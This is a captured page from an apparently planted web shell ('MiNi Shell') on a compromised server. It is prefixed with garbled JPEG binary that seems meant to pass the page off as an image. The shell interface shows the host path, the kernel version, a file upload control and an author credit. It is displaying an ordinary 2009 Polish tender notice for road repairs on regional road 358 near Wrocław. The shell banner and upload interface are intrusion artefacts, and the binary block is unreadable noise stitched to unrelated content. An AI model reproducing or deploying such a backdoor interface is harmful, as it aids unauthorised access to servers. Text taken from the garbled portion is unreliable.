JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090402/88668-N-2009.html

<p class="kh_header"><b>Wrocław: Poprawa stanu technicznego drogi wojewódzkiej nr 358 
od km 26+594 - 38+094 w ramach projektu - 
Polepszenie infrastruktury komunikacyjnej 
w Karkonoszach i Górach Izerskich.           
NR PROJEKTU CZ.3.22/1.100/08.00053
CPV 45.23.31.40-2
ZADANIE WSPÓŁFINANSOWANE PRZEZ UNIĘ EUROPEJSKĄ Z EUROPEJSKIEGO FUNDUSZU ROZWOJU REGIONALNEGO W RAMACH PROGRAMU OPERACYJNEGO WSPÓŁPRACY TRANSGRANICZNEJ 
REPUBLIKA CZESKA - RZECZPOSPOLITA POLSKA 2007 - 2013.</b><br>
<b>Numer ogłoszenia: 88668 - 2009; data zamieszczenia: 02.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląska Służba Dróg i Kolei we Wrocławiu , ul. Krakowska 28, 50-425 Wrocław, woj. dolnośląskie, tel. 071 39 17 103, 39 17 104, faks 071 3917105.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dsdik.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa jednostki samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Poprawa stanu technicznego drogi wojewódzkiej nr 358 
od km 26+594 - 38+094 w ramach projektu - 
Polepszenie infrastruktury komunikacyjnej 
w Karkonoszach i Górach Izerskich.           
NR PROJEKTU CZ.3.22/1.100/08.00053
CPV 45.23.31.40-2
ZADANIE WSPÓŁFINANSOWANE PRZEZ UNIĘ EUROPEJSKĄ Z EUROPEJSKIEGO FUNDUSZU ROZWOJU REGIONALNEGO W RAMACH PROGRAMU OPERACYJNEGO WSPÓŁPRACY TRANSGRANICZNEJ 
REPUBLIKA CZESKA - RZECZPOSPOLITA POLSKA 2007 - 2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Lokalizacja robót :Droga wojewódzka nr 358  km 26+594-31+944 i 33+944-38+094 (dawna droga wojewódzka nr 404 km 0+000-5+350 i 7+350-11+500)

1.Zakres przewidywanych robót :
a)	projekt i oznakowanie odcinka drogi oraz objazdów na czas prowadzonych robót - 1 kpl.
-	prześwietlenie koron drzew o wys.do 15 m- 70 szt.
-	wycinka drzew o średnicy pni pow. 100 cm z wywozem dłużyc do m.Gradówek -57 szt.
-	wykarczowanie pni po ściętych drzewach o średnicy  pow. 100 cm- 77 szt
-	rozbiórka przepustów pod drogą i zjazdami - 30 szt
-	przebudowa istniejącej sieci napowietrznej nn na dł.140 m z wymianą 4 słupów i 2 wysięgników oświetleniowych wraz z w uzyskaniem warunków likwidacji kolizji z Energia Pro, wykonaniem projektu, uzgodnieniami , badaniami i odbiorami-1 kpl.
-	wykonanie przepustów z rur PEHD pod drogą i zjazdami wraz ze ściankami czołowymi z kamienia łamanego na ławach betonowych o średnicy 400,800 mm - odpowiednio  90 m , 173 m
-	ścinka , regulacja i uzupełnienie poboczy gruntowych-20700 m2
-	odtworzenie rowów przydrożnych-9000 m
-	remont załamanych krwędzi jezdni - 2000 m2
-	remont cząstkowy nawierzchni bitumicznych-600 m2
-	frezowanie nawierzchni jezdni o gr. 5 cm- 15095 m2
-	remont chodników-5800 m2
-	remont elementów kanalizacji deszczowej ( studzienki i przykanaliki) - 37 szt
-	wymiana i regulacja włazów i przykryw urządzeń obcych - 81 szt.
-	remont muru oporowego z wymianą bariery zabezpieczającej - 90 m
-	wykonanie asfaltobetonowych warstw nawierzchniowych wraz z wykonaniem skropienia kolejnych warstw emulsją asfaltową :   w-wa wiążąca  5 cm-13963 m2 (km 26+594-28+544), w-wa wiążąca 6 cm- 39060m2( km 29+794-31+944 i 33+944-38+094 ) , w-wa ścieralna 4 cm -12090 m2 (km 26+594-28+544) , w-wa ścieralna 5 cm 43134 m2 (km 29+794-31+944 i 33+944-38+094  ), w-wa ścieralna 6 cm-8750 m2( km 28+544-29+794)- wg recept opracowanych dla kategorii ruchu KR 1-2 zgodnie z dawną normą PN-S-96025 Drogi samochodowe i lotniskowe. Nawierzchnie asfaltowe . Wymagania
-	odtworzenie pasów zieleni-2100 m2
-	wymiana oznakowania pionowego(znaki , lustra, słupki prowadzące i elementy azylu dla pieszych)-zgodnie z projektem organizacji ruchu docelowego - 1 kpl.
-	oznakowanie poziome grubowarstwowe białe (segregacja) i biało-czerwone (przejścia dla pieszych) zgodnie z projektem organizacji ruchu docelowego ( lokalizacja robót : droga wojewódzka nr 358 km 26+594-38+094 - dawna droga wojewódzka nr 404 km 0+000-11+500)- 1 kpl 

2. Uwagi ogólne:
2.1 Sprawy terenowo - prawne
Roboty remontowe powinny być prowadzone tylko i wyłącznie w granicach pasa drogowego drogi wojewódzkiej nr 358. Jeżeli Wykonawca zdecyduje o konieczności zajęcia terenów przyległych  ma obowiązek uzgodnić to z ich Właścicielami.

2.2 Inne
Szczegółowo zakres rodzaj i ilości robót opisane zostały w Specyfikacjach Technicznych  oraz przedmiarze robót  i kosztorysie ofertowym.

2.3 Materiały
Wszystkie podstawowe materiały , które Wykonawca ma zamiar wbudować w ramach zadania podlegają zatwierdzeniu przez Inspektora Nadzoru lub Laboratorium Drogowe DSDiK .

 2.4 W ramach ceny ofertowej Wykonawca zobowiązany będzie do zapewnienia:
1) pełnej obsługi geodezyjnej do prawidłowego wykonania robót w tym również wytyczenie granic pasa drogowego w zakresie uzgodnionym z Inspektorem Nadzoru wraz z wykonaniem inwentaryzacji geodezyjnej powykonawczej odcinka drogi od km 26+594 do km 38+094;
2) wykonania tablic informacyjnych budowy - 4 szt. według wzoru DSDiK i zamontowania na placu budowy według wskazań Inspektora Nadzoru  .Wykonawca będzie utrzymywał tablice w dobrym stanie technicznym w trakcie robót i 40 dni po odbiorze końcowym bezusterkowym 
3) organizacji zaplecza i utrzymania  placu budowy w czasie prowadzenia robót (Zamawiający nie zapewnia terenu pod zaplecze budowy oraz doprowadzenie i eksploatację mediów)
4) wykonania badań i prób związanych z oceną jakości materiałów , przewidzianych odpowiednimi zapisami STWiORB i Polskich Norm przez niezależne laboratorium drogowe, które Wykonawca zaproponuje w przetargu. Zamawiający  zastrzega sobie prawo do żądania od Wykonawcy zmiany wskazanego laboratorium  bez podania przyczyn oraz wykonywanie badań sprawdzających przez Laboratorium Drogowe DSDiK.
5) wykonania i zatwierdzenia projektu organizacji ruchu oraz zabezpieczenia miejsc prowadzenia prac na czas realizacji robót dla całego zadania zgodnie  z zatwierdzonym projektem organizacji ruchu zastępczego wraz z kosztami oznakowania ewentualnych robót dodatkowych.
6) uzgodnienie zajęcia oraz protokolarne przekazanie i odbiór przyległych terenów (jeżeli Wykonawca uzna to za konieczne do wykonania robót)  z ich Właścicielem oraz doprowadzenie ich do stanu pierwotnego i pokrycia ewentualnych szkód, strat lub opłat powstałych w wyniku prowadzenia robót
7) zapewnienie ciągłego bezpiecznego dojazdu i dojścia dla mieszkańców posesji na odcinkach robót
8) wszelkich uzgodnień i dokonania odbiorów w przypadku prowadzenia robót w obrębie skrzyżowań z drogami  powiatowymi i gminnymi z ich zarządcami
9) wszelkich uzgodnień i dokonanie odbiorów z ich właścicielami na etapie robót remontowych wykonywanych przy urządzeniach obcych( sieć kanalizacji, telekomunikacyjna, wodociągowa)
10) wywiezienia ziemi i gruzu na wysypisko oraz uwzględnienie w cenie oferty opłaty za składowanie
11) pełnej informacji dla mieszkańców, lokalnych władz i służb ratunkowych oraz przewoźników i lokalnych mediów o wprowadzanych utrudnieniach w ruchu.

Przed sporządzeniem oferty, oferent zobowiązany jest do dokonania wizji lokalnej w terenie i zdobycia wszelkich informacji, które mogą być konieczne do przygotowania oferty i podpisania umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości 100.000,00 zł (słownie: sto tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia ubiegać się mogą Wykonawcy składający ważną i odpowiednią ofertę oraz:
1.1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
1.2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
1.3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
1.4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 PZP,
a ponadto spełniają niżej wymienione warunki:
1.5.	dysponują lub będą dysponowali osobami zdolnymi do wykonania zamówienia oraz posiadającymi kwalifikacje niezbędne do wykonania zamówienia, tj. min. 1 pracownikiem z uprawnieniami do wykonywania samodzielnych funkcji kierownika robót i mogącym wykazać się decyzjami o stwierdzeniu przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie robót drogowych oraz przynależnością do właściwej Izby Samorządu Zawodowego,
1.6.	wykonali w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzieleniu zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, min. 2 zadania w zakresie budowy i/lub przebudowy i/lub remontu dróg (w tym roboty bitumiczne), o wartości min. 3 000 000,00 zł brutto każde. 
1.7.	wykonali w/w zadania należycie,
1.8.	dysponują  lub będą dysponowali sprzętem niezbędnym do wykonania zamówienia (w ilości min. szt.) tj. :
- układarka masy bitumicznej - min. 1 szt.
- zestaw walców drogowych (ogumiony, wibracyjny, gładki) -  min. 1 kpl. 
- koparko-ładowarka o poj. łyżki min. 0,4m3. - min. 1 szt.
1.9.	są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej - na kwotę min.                 3 000 000,00 zł,
a także:
2.	zgodnie z art. 26 ust. 2 załączą dokumenty wymienione w §1 ust. 1 pkt. 2, 3, 4, 5 ust. 2 pkt. 1, 3, 3a*, 5, 5a*, 6 ust. 3 pkt 3 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać zamawiający od wykonawcy (Dz.U. Nr 87 z dnia 24 maja 2006 r., poz. 605 z późn. zm.).  
* jeżeli dotyczy
-	oświadczą, że spełniają warunki określone w art. 22 ust. 1 PZP oraz że nie podlegają wykluczeniu z postępowania na podstawie art. 24 PZP.
3.	Sprawdzenie w/w warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> zgodnie z art. 26 ust. 2 załączą dokumenty wymienione w §1 ust. 1 pkt. 2, 3, 4, 5 ust. 2 pkt. 1, 3, 3a*, 5, 5a*, 6 ust. 3 pkt 3 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać zamawiający od wykonawcy (Dz.U. Nr 87 z dnia 24 maja 2006 r., poz. 605 z późn. zm.).  (* - jeżeli dotyczy)
oraz oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 PZP i nie podleganiu wykluczeniu z postępowania na podstawie art. 24 PZP..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.dsdik.wroc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Materiały przetargowe (SIWZ) można nabyć w cenie 6,00 zł w siedzibie Zamawiającego, pokój nr 217 lub za zaliczeniem pocztowym..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2009 godzina 12:00, miejsce: siedziba Zamawiającego, kancelaria, parter budynku.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com